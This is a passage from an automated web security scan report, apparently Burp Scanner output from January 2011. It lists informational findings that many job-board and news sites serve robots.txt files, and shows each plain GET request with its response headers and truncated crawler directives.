Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.54. http://www.internshipcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.internshipcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.internshipcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:43:40 GMT
ETag: "1b80322-1a83-483c74703bb00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.55. http://www.j2eecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.j2eecrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.j2eecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:11:53 GMT
ETag: "2650104-1bd8-476fb2f85a840"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.56. http://www.journalismcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.journalismcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.journalismcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:10 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:52:50 GMT
ETag: "22f1718-1a83-483c767cc1080"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.57. http://www.logisticscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.logisticscrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.logisticscrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:53:10 GMT
ETag: "22aa0fd-1a83-483c768fd3d80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.58. http://www.managercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.managercrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.managercrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:12 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:19:05 GMT
ETag: "1c881c1-1a7f-4948c25104c40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6783
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seoDisallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.59. http://www.manufacturingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.manufacturingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manufacturingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:48 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:18:21 GMT
ETag: "22d01a5-1b0f-4948c2270e940"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6927
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.60. http://www.marketingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 26 Dec 2009 11:39:31 GMT
ETag: "25b0359-1cea-47ba0202322c0"
Accept-Ranges: bytes
Content-Length: 7402
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.61. http://www.mediajobcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mediajobcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediajobcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:13:45 GMT
ETag: "25a02ee-1bd8-476fb3632a440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.62. http://www.medicalschoolloans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.medicalschoolloans.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.medicalschoolloans.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:53 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 23 Apr 2007 06:58:45 GMT
ETag: "e98580-2086-42ec2333cd340"
Accept-Ranges: bytes
Content-Length: 8326
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://www.medicalschoolloans.com

User-agent: Googlebot
Sitemap: http://www.medicalschoolloans.com/sitemap.xml
Disallow: /admin
Disallow: /calculator
Disallow: /chat
Disa
...[SNIP]...

19.63. http://www.militarycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.militarycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.militarycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:32 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:35:48 GMT
ETag: "1c30107-1bf0-476faae7a6100"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.64. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41161439/ns/politics-more_politics/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 151
Date: Fri, 21 Jan 2011 23:39:25 GMT
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/SitemapIndex.xml

19.65. http://www.nursingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nursingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nursingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:00 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:36:07 GMT
ETag: "21f015a-1bf0-476faaf9c4bc0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.66. http://www.nytimes.com/2011/01/18/books/18book.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/2011/01/18/books/18book.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 22 Jan 2011 01:23:31 GMT
Content-length: 637
Content-type: text/plain
Set-cookie: RMID=0b5d4aea4f854d3a319327e5; expires=Sunday, 22-Jan-2012 01:23:31 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 26 Apr 2010 17:28:40 GMT
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Allow: /ads/public/
Disallow: /ads/
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /auth/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /fi
...[SNIP]...

19.67. http://www.occupationaltherapycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.occupationaltherapycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.occupationaltherapycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:25 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:36:27 GMT
ETag: "22a00ff-1bf0-476fab0cd78c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.68. http://www.operationscrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.operationscrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.operationscrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:44:38 GMT
ETag: "25483f0-1a83-483c74a78bd80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.69. http://www.parttimecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parttimecrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parttimecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:14 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:54:36 GMT
ETag: "22d05b0-1a83-483c76e1d7f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.70. http://www.pharmaceuticalcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pharmaceuticalcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pharmaceuticalcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:39:50 GMT
ETag: "269830f-1a84-483c7394e3580"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.71. http://www.physicalsecuritycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.physicalsecuritycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.physicalsecuritycrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:53:32 GMT
ETag: "2138111-1a83-483c76a4cef00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.72. http://www.physicaltherapycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.physicaltherapycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.physicaltherapycrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:19 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:25:25 GMT
ETag: "2218488-1b0e-4948c3bb6a340"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6926
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 1000-1500
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.73. http://www.planningcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.planningcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.planningcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:14 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:37:09 GMT
ETag: "25d8332-1bf1-476fab34e5740"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7153
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.74. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.politico.com
Path:	/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 18 Nov 2008 21:19:00 GMT
ETag: "80e01b-158-3e7bd900"
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Fri, 21 Jan 2011 23:44:49 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Content-Length: 344
Connection: close

Sitemap: http://www.politico.com/sitemap_index.xml
Sitemap: http://www.politico.com/sitemap_googlenews.xml
Sitemap: http://www.politico.com/sitemap_news.xml
User-agent: *
Disallow: /2step
Disallo
...[SNIP]...

19.75. http://www.postdoctoralfellowcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postdoctoralfellowcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.postdoctoralfellowcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 13 Apr 2010 09:22:53 GMT
ETag: "24d0113-1a82-4841ace5c1540"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6786
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seoDisallow: /soap
Disallow: /xajax_js
Disallow:
...[SNIP]...

19.76. http://www.prcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 16 Dec 2010 05:52:29 GMT
ETag: "24f85f8-1bef-49780a8b6c140"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7151
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow:
...[SNIP]...

19.77. http://www.procurementcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.procurementcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.procurementcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:40 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:37:51 GMT
ETag: "2218105-1bf0-476fab5cf35c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.78. http://www.productmanagercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.productmanagercrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.productmanagercrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:49:09 GMT
ETag: "2508103-1a83-483c75a9fdf40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.79. http://www.projectmanagementcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.projectmanagementcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.projectmanagementcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:21 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:38:17 GMT
ETag: "26b82e3-1c1a-476fab75bf040"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7194
Connection: close
Via: 1.1 AN-0016020122545304

# Robots.txt file for http://www.projectmanagementcrossing.com

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Dis
...[SNIP]...

19.80. http://www.publicinterestcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.publicinterestcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publicinterestcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:35 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:38:40 GMT
ETag: "21f032a-1bf0-476fab8bae400"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.81. http://www.publishingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.publishingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publishingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:39:00 GMT
ETag: "25c0270-1bf0-476fab9ec1100"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.82. http://www.purchasingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.purchasingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.purchasingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:52:18 GMT
ETag: "1c8035e-1a83-483c765e3c880"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.83. http://www.qaqccrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qaqccrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qaqccrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:39:20 GMT
ETag: "25e013b-1bf0-476fabb1d3e00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.84. http://www.radiocrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.radiocrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radiocrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:16 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:39:33 GMT
ETag: "22d1cce-1bf0-476fabbe39b40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.85. http://www.realestateandlandcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.realestateandlandcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realestateandlandcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:01 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:45:25 GMT
ETag: "1d18381-1a83-483c74d45e740"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.86. http://www.recruitingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.recruitingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.recruitingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:16:12 GMT
ETag: "25b012a-1bd8-476fb3ef5af00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.87. http://www.researchingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.researchingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.researchingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:50:50 GMT
ETag: "1ba8130-1a83-483c760a50280"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.88. http://www.retailcrossing.com/ previous next

Summary

Severity:	Information
